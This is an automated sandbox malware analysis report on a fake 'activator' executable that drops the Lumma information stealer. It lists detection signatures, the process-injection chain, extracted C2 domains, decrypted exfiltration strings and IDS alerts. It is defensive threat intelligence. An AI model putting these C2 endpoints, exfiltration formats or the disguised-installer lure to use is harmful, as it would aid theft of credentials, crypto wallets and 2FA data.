Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Activator by URKE v2.5.exe

Overview

General Information

Sample name:Activator by URKE v2.5.exe
Analysis ID:1525047
MD5:95d5f32afd610e2e7077bd350eac99c0
SHA1:8fe090a11768454297c17b31fd164a0f2685eca7
SHA256:9e12b0e0ec0101e6fcb4c10e1b5958e534f937dfdc9394b2095b06f29d22867f
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Activator by URKE v2.5.exe (PID: 2740 cmdline: "C:\Users\user\Desktop\Activator by URKE v2.5.exe" MD5: 95D5F32AFD610E2E7077BD350EAC99C0)
    • n3.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe" MD5: 2706AC6F789E6BDBDA8DAE9D8460FEC8)
      • BitLockerToGo.exe (PID: 4368 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
    • chrome.exe (PID: 4236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deallyharvenw.shop", "covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "branchtriviawlek.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "abortinoiwiam.shop", "surroundeocw.shop"], "Build id": "tLYMe5--3"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:19.961621+020020546531A Network Trojan was detected192.168.2.649707104.21.42.210443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:19.961621+020020498361A Network Trojan was detected192.168.2.649707104.21.42.210443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.352943+020020560681Domain Observed Used for C2 Detected192.168.2.6593011.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.375637+020020560661Domain Observed Used for C2 Detected192.168.2.6591631.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.319367+020020560741Domain Observed Used for C2 Detected192.168.2.6494461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.308396+020020560761Domain Observed Used for C2 Detected192.168.2.6624241.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.330985+020020560721Domain Observed Used for C2 Detected192.168.2.6598741.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.341243+020020560701Domain Observed Used for C2 Detected192.168.2.6515511.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.295246+020020560781Domain Observed Used for C2 Detected192.168.2.6632301.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-03T16:09:17.363756+020020560641Domain Observed Used for C2 Detected192.168.2.6598461.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: 2.2.n3.exe.2ad4000.3.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["deallyharvenw.shop", "covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "branchtriviawlek.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "abortinoiwiam.shop", "surroundeocw.shop"], "Build id": "tLYMe5--3"}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeReversingLabs: Detection: 62%
    Multi AV Scanner detection for submitted file
    Source: Activator by URKE v2.5.exeReversingLabs: Detection: 47%
    Sample uses string decryption to hide its real strings
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: covvercilverow.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: surroundeocw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abortinoiwiam.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pumpkinkwquo.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: priooozekw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deallyharvenw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: defenddsouneuw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: racedsuitreow.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: branchtriviawlek.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tLYMe5--3
    Source: https://iplogger.com/1KhnJ4HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
    Source: https://iplogger.com/1KhnJ4HTTP Parser: No favicon
    Source: https://iplogger.com/1KhnJ4HTTP Parser: No favicon
    Source: https://iplogger.com/1KhnJ4HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.42.210:443 -> 192.168.2.6:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: Activator by URKE v2.5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: drvstore.pdbUGP source: drvstore.dll
    Source: Binary string: DUI70.pdbUGP source: dui70.dll
    Source: Binary string: BitLockerToGo.pdb source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: main.PdBZjclTtSvJRifuFYQiitxyoCIkNHGKTcVnnvxAzYWmHRXTXqWdymDLj source: n3.exe
    Source: Binary string: dsreg.pdbGCTL source: dsreg.dll
    Source: Binary string: DWrite.pdbUGP source: DWrite.dll
    Source: Binary string: dsound.pdbUGP source: dsound.dll
    Source: Binary string: dpx.pdb source: dpx.dll
    Source: Binary string: BitLockerToGo.pdbGCTL source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dsadmin.pdbGCTL source: dsadmin.dll
    Source: Binary string: dsuiext.pdb source: dsuiext.dll
    Source: Binary string: dosvc.pdb source: dosvc.dll
    Source: Binary string: dxgi.pdbUGP source: dxgi.dll
    Source: Binary string: DUI70.pdb source: dui70.dll
    Source: Binary string: DUser.pdbUGP source: duser.dll
    Source: Binary string: dxil.pdb source: dxil.dll
    Source: Binary string: dsreg.pdb source: dsreg.dll
    Source: Binary string: dpx.pdbGCTL source: dpx.dll
    Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\dxcompiler.dll.pdb source: dxcompiler.dll
    Source: Binary string: drvstore.pdb source: drvstore.dll
    Source: Binary string: dsuiext.pdbGCTL source: dsuiext.dll
    Source: Binary string: dwmcore.pdb source: dwmcore.dll
    Source: Binary string: DWrite.pdb source: DWrite.dll
    Source: Binary string: dsadmin.pdb source: dsadmin.dll
    Source: Binary string: dxgi.pdb source: dxgi.dll
    Source: Binary string: dwmcore.pdbUGP source: dwmcore.dll
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: Activator by URKE v2.5.exe
    Source: Binary string: DUser.pdb source: duser.dll
    Source: Binary string: dsound.pdb source: dsound.dll
    Source: Binary string: dosvc.pdbUGP source: dosvc.dll
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5EF647C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F23130 FindFirstFileExA,0_2_00007FF7E5F23130
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044B050
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dl, 01h3_2_00416016
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]3_2_0044A020
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_0044A020
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+28h]3_2_004340F2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_004240A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_0041513F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044B1E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00423190
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_00445230
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edi]3_2_00445230
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah3_2_0044B360
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp+14h]3_2_0040131C
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_004423D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 77A9E0C4h3_2_004404F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00413545
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], ax3_2_00428556
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, word ptr [ecx]3_2_00428556
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_0044A570
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 00000000h3_2_004035F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_0041562A
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh3_2_00449630
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+000001B8h]3_2_00431750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]3_2_00431750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00431750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh3_2_0042B720
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh3_2_0042B720
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_0042D720
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_004207C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000004B0h]3_2_0041D792
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_0041D792
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ebx+00h]3_2_00404870
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+ecx*8], C766965Ch3_2_004448D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]3_2_0040D970
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then dec ebx3_2_0043F920
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00404A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_0041AA70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042FAC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_0042DAE0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043BB50
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_00405B70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh3_2_00444B10
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0042BB20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_00426BDA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh3_2_00448BA0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-000000CCh]3_2_0042ABBC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_00445C60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, word ptr [eax]3_2_00449C70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]3_2_00449C70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_00449C70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00420CE9
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00425D20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+64h]3_2_00432DD3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, ebx3_2_00408D90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi3_2_00427E73
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi3_2_00427E73
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]3_2_00449E90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_00449E90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00413F7E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, ecx3_2_00413F7E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_00411F33
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00425F80
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00433FA1
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]3_2_00433FB6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00433FB6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00433FB6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax3_2_0042CFBC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_0042CFBC

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056076 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop) : 192.168.2.6:62424 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.6:63230 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056072 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop) : 192.168.2.6:59874 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056066 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop) : 192.168.2.6:59163 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056074 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop) : 192.168.2.6:49446 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056068 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop) : 192.168.2.6:59301 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056070 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop) : 192.168.2.6:51551 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056064 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop) : 192.168.2.6:59846 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.42.210:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.42.210:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: deallyharvenw.shop
    Source: Malware configuration extractorURLs: covvercilverow.shop
    Source: Malware configuration extractorURLs: priooozekw.shop
    Source: Malware configuration extractorURLs: pumpkinkwquo.shop
    Source: Malware configuration extractorURLs: branchtriviawlek.shop
    Source: Malware configuration extractorURLs: defenddsouneuw.shop
    Source: Malware configuration extractorURLs: racedsuitreow.shop
    Source: Malware configuration extractorURLs: abortinoiwiam.shop
    Source: Malware configuration extractorURLs: surroundeocw.shop
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
